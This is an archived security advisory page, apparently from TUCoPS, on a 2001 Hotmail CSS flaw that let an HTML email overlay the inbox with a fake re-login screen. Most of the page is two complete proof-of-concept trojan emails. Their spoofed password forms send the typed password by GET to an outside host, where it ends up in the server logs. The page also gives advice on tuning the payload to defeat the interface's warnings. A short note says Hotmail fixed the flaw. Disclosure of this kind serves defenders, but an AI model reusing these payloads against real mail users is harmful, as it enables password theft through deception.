Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: hmail12.htm

Hotmail - hiding warnings



Vulnerability

    Hotmail

Affected

    Hotmail

Description

    Gregory Duchemin found following.   In his advisory, Ben Li  spoke
    about a  bug in  most of  next generation  browsers that deal with
    css  and  a  broken  image  that  leads  to  a  general html links
    corruption:

        webmail4.htm

    A  similar  problem  exist  with  css  used inside a web base mail
    server with  this time  a plain  image but  no link  needed.  It's
    possible  to  generate  some  mail  trojans that will recover user
    personal information like passwords.  It's no longer a bug in  the
    browsers, but in the implementation of servers html filters.

    Gregory did some test with Hotmail  and MsIe 4/5 (NT) and it  work
    really fine.  In fact we have here a very serious hole.

    It was possible (at least with Hotmail) to use a background  layer
    with a full blank picture to erase all the browser screen (Hotmail
    desktop) and by using another  top layer with a slightly  modified
    password requester  it would  be easy  to fool  most people around
    here.

    A simple 'img href' to an outside 1x1 white pixel picture expanded
    to  1280x768  is  ok  for  the  background  layer  and  will clean
    everything.

    Since the new  frame appear over  the first one  and not in  a new
    window like in the usual way, the Microsoft top frame warning that
    user is going outside hotmail will no longer exist.

    So, from the user  side, just after clicking  on his mail to  read
    it,  the  screen  will  show  him  what  he  would trust to be the
    hotmail relogin page.  The URL inside the browser is still Hotmail
    so he has no really obvious reason to worry except if he took  the
    same login page 2 minutes just before.

    The relogin page, embedded in the mail inside the top layer, won't
    be really  the same  as the  original one,  the form  field may be
    changed with an  unsecure http connection  and a GET  method while
    pointing to the  attacker web server.   Then, the password  in his
    web server logs,  the attacker may  finaly redirect the  victim to
    the real page.

    Below, "only some skulls" of a mail exploit: copyrighted  material
    was needed.

        <div align="left">

        <div id="layer1" style="width:99px; height:99px; position:absolute;
        left:0px; top:0px; z-index:0;">
        <!-- First Layer, a big blank screen to hide Hotmail desk -->

        <div id="layer2" style="position:absolute; left:140; top:100; z-index:0;">
        <!-- Layer 2, will show up text, pics, form -->

        <!-- Here the new hotmail login.html that point to our web server
        Need Microsoft login page with all copyrighted
             logos, banners ... -->

        </div>
        </div>

    Gregory Duchemin sent  following as the  proof of concept  for css
    hotmail spoofing/ password recovery.   To use it, just mail  it to
    yourself not  others.   All graphics  were made  by the  author to
    explicitly show it is not  the real hotmail relogin page  and thus
    preventing any abuse and copyright violation.  This did work  fine
    with MSIE,  would need  some little  changes to  work on Netscape.
    Note that we have here 2 versions.

    <html>

    <!-- H0RSEM4IL.c0m , trojanized mail to catch users password.

         A proof of concept for most of web based mailer.
         Tested on Hotmail with msie.

         To try it, just mail this page to an hotmail mailbox but remember
         This page is for educational purposes ONLY !

    -->



    <body>

    <div align="left">
      <div id="layer1" style="width:1280px; height:768px; position:absolute; left:0px; top:0px; z-index:0;">

        <!-- First Layer, a big blank screen to hide Hotmail desk -->

            <div id="layer2" style="position:absolute; left:40; top:100; z-index:0;">

            <!-- Layer 2, will show up the near to original hotmail re-enter
                 password screen ;) -->

            <!-- Here we have slightly modified the orignal hotmail login.html to point
                 on our own site with GET method to catch password in our logs -->

	    <form name="passwordform" target="layer2" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_top" AUTOCOMPLETE="OFF" >
            <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td colspan=2>
	    <table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
	    <a href="javascript:void()" target="_top"><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
	    </td>
	    <td align="CENTER" nowrap>
	    <img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
            <a href="javascript:void()" target="_top"><font class="f" size=2>Help</font></a><br>
	    </td></tr></table>
	    </td>
	    </tr><tr>
	    <td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
	    <td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
	    </tr>
	    <tr><td height="6"></td></tr>
	    <tr valign="top">
	    <td><font class="s">

	    </font>
	    </td>
	    <td rowspan=4><font class="s">

	    </font>
            </font>
            </td>
	    </tr>

            <tr>
            <td>
            <font class="f" size=2><b><victim@hotmail.com></b></font>
	    <input type="hidden" name="domain" value="hotmail.com">
            <table cellpadding=0 cellspacing=0>
            <tr>
            <td height=35 valign="middle"><font class="sbd">Password</font> </td>
            <td><input type="password" name="passwd" size="16" maxlength="16"></td>
            <td width=22 valign="middle" align="center"> </td>
            <td><input type="submit" name="enter" value="Sign in"></td>
            </tr>
            <tr>
            <td></td>
            <td colspan="2"><font class="f" size=2><b><a href="javascript:void()" target="_top">Change
                User</a></b></font></td>
            </tr>
	    </table>

            </form>
            </table>
	    <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td> 
            <font class="s">Fake © 2001 P0w3rsoft Corporation. All rights not reserved.</font>
            <a href="javascript:void()">H0rsemail TERMS OF USE and NOTICES</font></a>  
            <a href="javascript:void()"><font class="s">untrusted Privacy Statement</font></a>
	    </td>
	    </tr>
	    </table>





           </div>

           <p align="center">

           <img src="http://c3rber.multimania.com/hotmail.jpg" width="1280" height="950" border="0" >
           </div>

           </div>

      </body>

    <--

         Gregory Duchemin  - Security Consultant -
         NEUROCOM CANADA
         1001 bd Maisonneuve Ouest - suite 200
         H3A 3C8 Montreal - Quebec - CANADA
         c3rb3r@hotmail.com

         Original idea : Ben Li <bali@THOCK.COM>


      -->
    </html>

    Above exploit  is broken  with MSIE  5.50, in  fact the background
    image won't appear  at all, anyway  it was a  bad idea to  use it.
    Below is  a new  version that  will work  with msie  4/5/5.50, the
    background color is now fixed as a blank value (#ffffff) into  the
    div class (thus deleting one useless connection).

    The mail folders navigator input form that buggily appeared on the
    top layer  was fix  too by  playing with  its porperties  (select{
    visibility:hidden}).  The scrollbar at the bottom was reduced with
    the help of the class width parameter.  You will have to choose it
    accordingly to the screen res of the trojan receiver, if You don't
    know, just take a big value.

    But  this  exploit  isn't  absolutely  perfect, we have still this
    advertising  iframe  at  the  top  middle  and  since we can't use
    javascript to modify  its properties.   This iframe tag  is really
    interesting but already filtered by  hotmail and yahoo, may be  in
    some cross-vulnerable sites list that was diffused here some weeks
    ago.

    NOTE: To work properly, the  message MUST BEGIN with the  html tag
    (nothing above).  Don't use it for any malicious activity:

    <html>
    <div align="left">
    
    <style type="text/css">
    <!--
    div.trojan {
    background-color: #ffffff;
    background-repeat: repeat;
    position: absolute;
    width: 850px;
    height: 950px;
    top: 0px;
    left: 0px;
    visibility: visible;
    z-index: 0;
    font-family: times;
    font-size: 72px;
    }
    -->
    </style>
    
    <div id="layer1" class="trojan">
    <div id="layer2" class="trojan" style="left:80px;top:100px;
    ">
    
    <form name="passwordform" target="_blank" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_blank" AUTOCOMPLETE="OFF" >
    
            <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td colspan=2>
	    <table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
	    <a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
	    </td>
	    <td align="CENTER" nowrap>
	    <img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
            <a href="#" ><font class="f" size=2>Help</font></a><br>
	    </td></tr></table>
	    </td>
	    </tr><tr>
	    <td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
	    <td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
	    </tr>
	    <tr><td height="6"></td></tr>
	    <tr valign="top">
	    <td><font class="s">
    
	    </font>
	    </td>
	    <td rowspan=4><font class="s">
    
	    </font>
            </font>
            </td>
	    </tr>
    
            <tr>
            <td>
            <font class="f" size=2><b><victim@hotmail.com></b></font>
            <table cellpadding=0 cellspacing=0>
            <tr>
            <td height=35 valign="middle"><font class="sbd">Password</font> </td>
            <td><input type="password" name="passwd" size="16" maxlength="16"></td>
            <td width=22 valign="middle" align="center"> </td>
            <td><input type="submit" name="enter" value="Sign in"></td>
            </tr>
            <tr>
            <td></td>
            <td colspan="2"><font class="f" size=2><b><a href="#" >Change
                User</a></b></font></td>
            </tr>
	    </table>
    
            </form>
            </table>
	    <table cellpadding=0 cellspacing=0 border=0 width=590>
	    <tr>
	    <td> 
            <font class="s">Hotmail © Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
            <a href="javascript:Filtered()" target="_blank">H0rsemail TERMS OF USE and NOTICES</font></a>  
            <a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
	    </td>
	    </tr>
	    </table>
    
    
    
    
    
           </div>
    
           <p align="center">
    
           </div>
    
           </div>
    
    
    
    
    
    <style type="css/text">
    <!--
    input { visibility: hidden }
    select { visibility: hidden; color: #ffffff }
    option { visibility: hidden; color: #ffffff }
    iframe { visibility: hidden; color: #ffffff }
    div {
    background-color: #ffffff;
    background-repeat: repeat;
    position: absolute;
    width: 0px;
    height: 0px;
    top: 0px;
    left: 0px;
    visibility: hidden;
    z-index: 1;
    font-family: times;
    font-size: 72px;
    }
    -->
    </style>
    
    <!--
        Gregory Duchemin  - Security Consultant -
        NEUROCOM CANADA
        1001 bd Maisonneuve Ouest - suite 200
        H3A 3C8 Montreal - Quebec - CANADA
        c3rb3r@hotmail.com
    
        Just a proof of concept, don't use it for illegal purposes
    
        Original idea : Ben Li <bali@THOCK.COM>
    
      -->
    
    <div id="trash">
    <!--

Solution

    Hotmail has  fixed the  "css hotmail  spoofing/ password recovery"
    bug.     Hotmail  will  replace  "positon:  absolue" by "position:
    static".


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH